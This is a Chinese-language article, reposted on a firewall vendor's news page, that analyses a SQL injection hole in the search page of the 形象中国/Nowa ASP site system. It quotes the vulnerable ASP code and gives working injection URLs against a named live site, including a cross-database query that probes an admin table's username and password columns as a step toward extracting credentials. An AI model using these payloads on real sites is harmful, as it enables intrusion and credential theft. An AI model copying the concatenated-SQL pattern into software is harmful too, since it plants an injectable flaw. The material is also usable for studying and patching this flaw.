English
 电子信箱
 加入收藏

  威盾防火墙 >> 新闻中心 >> 业界动态 >> 对形象中国全站系统的搜索注入漏洞的一点分析

 

对形象中国全站系统的搜索注入漏洞的一点分析

威盾防火墙 2015-01-21

 
首先声明,这个漏洞不是我发现的,我只是作了一次的分析,不足之处请不吝指教。
这个站点在当初被认为是比较安全的全站系统,事实上现在也是。(后来的补丁里出现了上传漏洞,不在讨论之列。)因此这个系统被改编为很多版本:
Nowa 0.94版本(原版)
形象中国整站(修改版本)
蓝雨整站(修改版本) 
落日整站(修改版本) 
流星整站(修改版本)---------------------------------------------(感谢hak_ban提供)
我的站http://www.918x.com就是这个系统的,还有很多的站点用到这个系统(包括小路的666w.com,嘿嘿)。
我们先来看漏洞文件的原代码:
<%sub article_body()
dim totalart,Currentpage,totalpages,i,j,colname
openarticle
sql="select art_id,cat_id,art_title,art_date,art_count from art order by art_date DESC"
if request("cat_id")<>"" then
sql="select art_id,cat_id,art_title,art_date,art_count from art where cat_id="&request("cat_id")&" order by art_date DESC"
elseif request("keyword")<>"" then
sql="select art_id,cat_id,art_title,art_date,art_count from art where "&request("select")&" like %"&request("keyword")&"%order by art_date DESC"
elseif request("cat_id")<>"" and request("keyword")<>"" then
sql="select art_id,cat_id,art_title,art_date,art_count from art where art_title or art_content like %"&request("keyword")&"%order by art_date DESC"
end if
set rs=server.createobject("adodb.recordset")
rs.open sql,conn,1,1
%>
关键这句:sql="select art_id,cat_id,art_title,art_date,art_count from art where "&request("select")&" like %"&request("keyword")&"%order by art_date DESC"
我们从另一个文件FORMAT.asp里发现文件对request的keyword变量进行了过滤,却没有对request的select进行有 效检查。
所以当我们提交(%20是空格)
_title&keyword=1%20and%201=1" target=_blank>http://www.918x.com/article.asp?select=art_title&keyword=1%20and%201=1
是不成功的,但是提交:
_blank>http://www.918x.com/article.asp? keyword=1&select=art_title%20and%201=1
_blank>http://www.918x.com/article.asp? keyword=1&select=art_title%20and%201=2
就能成功的达到注入的目的。
整个文章系统有两处搜索,除了article.asp还有download.asp,于是看了看代码,却没有发现&request("select"),而是直接把soft_name等放在查询中,看起来好象这两个查询不是同一个人写的。
再来说说利用。我们知道,这个整站有5个数据库,密码保存在admin.mdb里(默认情况下)。
而上述注入只是征对article.mdb的。我们最多能够暴出article.mdb表里的数据。
那能不能跨库查询呢?
首先我必须知道保存admin的数据库的名字,假设为admin.asp,我们还需要知道数据库的物理路径,假设为d:\web\data\ 然后如下查询:
_blank>http://www.918x.com/article.asp? keyword=1&select=art_title%20and %200<>(select%20count(*)%20from%20d:\web\data\admin.asp.admin%20where%20admin_name)
_blank>http://www.918x.com/article.asp? keyword=1&select=art_title%20and %200<>(select%20count(*)%20from%20d:\web\data\admin.asp.admin%20where%20admin_password)
返回成功,则说明有admin表和admin_name,admin_password列。
接下来便可以注入,暴出用户名和密码来。我就不多说了,大家都会的。
这种情况适用于
1.知道数据库的物理路径
2.数据库不在可访问的web目录里,在上级目录,或者其他地方,或者数据库作了防下载处理(否则我们可以直接下载admin数据库,又何必注入那么麻烦呢。)
总的来说利用的价值不大,何况20040415的补丁使得密码还是md5加密的

相关内容: 最新内容:
dvsp2上传漏洞再现----击溃动网sp2的神话[2015-01-21]
如何对PHP程序中的常见漏洞进行攻击[2015-01-21]
WEB安全,SQL注入漏洞的加固代码汇总[2015-01-20]
SQL注入漏洞[2015-01-20]
SQL注入漏洞全接触--高级篇[2015-01-20]
来自微软漏洞研究与防御BLOG的SQL注入防范[2015-01-13]
dvsp2上传漏洞再现----击溃动网sp2的神话[2015-01-21]
剖析网站遭遇的三次入侵 分析黑客入侵方法[2015-01-21]
如何对PHP程序中的常见漏洞进行攻击[2015-01-21]
XSS跨站脚本攻击初探[2015-01-21]
如何有效的防御SQL注入攻击?[2015-01-21]
专题:SQL注入攻击与防御[2015-01-21]